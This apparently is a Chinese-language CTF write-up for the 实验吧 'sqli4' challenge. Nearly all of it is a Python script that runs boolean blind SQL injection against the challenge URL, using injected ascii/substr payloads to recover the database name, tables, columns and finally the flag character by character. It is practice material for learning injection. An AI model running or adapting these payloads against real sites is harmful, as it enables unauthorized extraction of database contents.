menu 雨落亭
search
实验吧-sqli4
雨落
雨落
Time:
share




一道盲注题

脚本:

#bool型SQL盲注,py脚本--  
#https://blog.csdn.net/weixin_40709439/article/details/81355856
import requests as rq
import re
import time

url='http://ctf5.shiyanbar.com/web/index_3.php'
mystr="0123456789abcdefghijklmnopqrstuvwxyz"
m_str="sqcwertyuioplkjhgfdazxvbnm"
flag_str=mystr+"ABCDEFGHIJKLMNOPQRSTUVWXYZ}@_{"


#猜数据库名长度
def c_dblength():
    t=0
    for i in range(1,5):
        data="?id=1' and length(database())=%d%%23" %(i)#%需要双写转义
        myurl=url+data
        #print (myurl)
        response = rq.get(myurl)
        if "Hello" in response.text:
            print (i)
            t=i
            break
    return t
#猜数据库名
def c_dbname(len):
    flag=""
    for i in range(1,len+1):
        for j in mystr:
            char_ascii=ord(j)  #ord函数返回字符对应的十进制
            data="?id=1' and ascii(substr(database(),%d,1))=%s%%23" %(i,char_ascii)#%需要双写转义
            myurl=url+data
            #print (myurl)
            re = rq.get(myurl)
            if "Hello" in re.text:
                flag+=j
                break
    print(flag)

#猜表个数
def c_tbcount():
    t=0
    for i in range(1,4):#这里个数是2个
        data="?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=%d%%23" %(i)#%需要双写转义
        myurl=url+data
        #print (myurl)
        response = rq.get(myurl)
        if "Hello" in response.text:
            print (i)
            t=i
            break
    return t


#猜表名 (跟猜数据库一样,猜出长度,然后猜表名)
def c_tbname(ct):
    
    for i in range(0,ct):
        #猜长度
        t1=0
        for j in range(1,8):
            
            data="?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit %d,1))=%d%%23" %(i,j)
            myurl=url+data
            #print(myurl)
            re = rq.get(myurl)
            if "Hello" in re.text:
                t1=j
                break
        print(t1)
        #猜表名
        flag=""
        for j in range(1,t1+1):
            for k in mystr:
                char_ascii=ord(k)
                data="?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)))=%s%%23" %(i,j,char_ascii)
                print(data)
                myurl=url+data
                time.sleep(2)
                re = rq.get(myurl)
                #print(re.text)
                if "Hello" in re.text:
                    flag+=k
                    break
        print(flag)

    return

###############################################################  猜列
#猜列名
def c_colname(mytables):
    
    for i in range(0,1):  #循环一次,不用管他
        #猜列名的长度
        t1=0
        for j in range(1,8):
            data="?id=1' and length((select column_name from information_schema.columns where table_name='%s' limit 1))=%d%%23" %(mytables,j)#limit 1表示检索第一条记录行
            myurl=url+data
            #print(data)
            re = rq.get(myurl)
            if "Hello" in re.text:
                t1=j
                break
        print(t1)
        #猜列名
        flag=""
        for j in range(1,t1+1):
            for k in m_str:
                char_ascii=ord(k)
                data="?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='%s' limit 1),%d,1)))=%s%%23" %(mytables,j,char_ascii)
                print(data)
                myurl=url+data
                #time.sleep(2)
                re = rq.get(myurl)
                #print(re.text)
                if "Hello" in re.text:
                    flag+=k
                    break
        print(flag)

    return


#得flag 猜数据
def c_flag(mytable,mycolumn):
    #判断有几行数据
    t=0
    for i in range(1,10):
        data="?id=1' and (select count(*) from %s )=%d%%23" %(mytable,i)
        myurl=url+data
        #print (data)
        response = rq.get(myurl)
        if "Hello" in response.text:
            #print (i)
            t=i
            break
    print(t)
    #数据长度
    len=0
    for i in range(1,t+1):
        for j in range(1,40):
            data="?id=1' and length((select %s from %s))=%d %%23" %(mycolumn,mytable,j)
            myurl=url+data
            #print(data)
            re = rq.get(myurl)
            if "Hello" in re.text:
                len=j
                break
        print(len)

    #开始才出数据
    flag=""
    for i in range(1,t+1):
        for j in range(1,len+1):
            for k in flag_str:
                data="?id=1' and (ascii(substr((select %s from %s),%d,1)))=%s%%23" % (mycolumn,mytable,j,ord(k))
                myurl=url+data
                #print (data)
                time.sleep(1)
                response = rq.get(myurl)
                if "Hello" in response.text:
                    flag+=k
                    print(flag)
                    break
        print(flag)



if __name__ == '__main__':
    #len=c_dblength()#长度为4
    #c_dbname(len)  #猜数据库名
    #ct = c_tbcount()

    #c_tbname(2)  #猜表名。。。得到flag和web1这2个表
    #c_colname("flag") #猜列  得到列flag
    c_flag("flag","flag")    #拿flag

评论

   textsms
   account_circle
昵称不能为空
   email
邮箱格式错误
   language





message 没有评论惹=_=

下一篇 arrow_forward
APP漏洞挖掘
下一篇 arrow_forward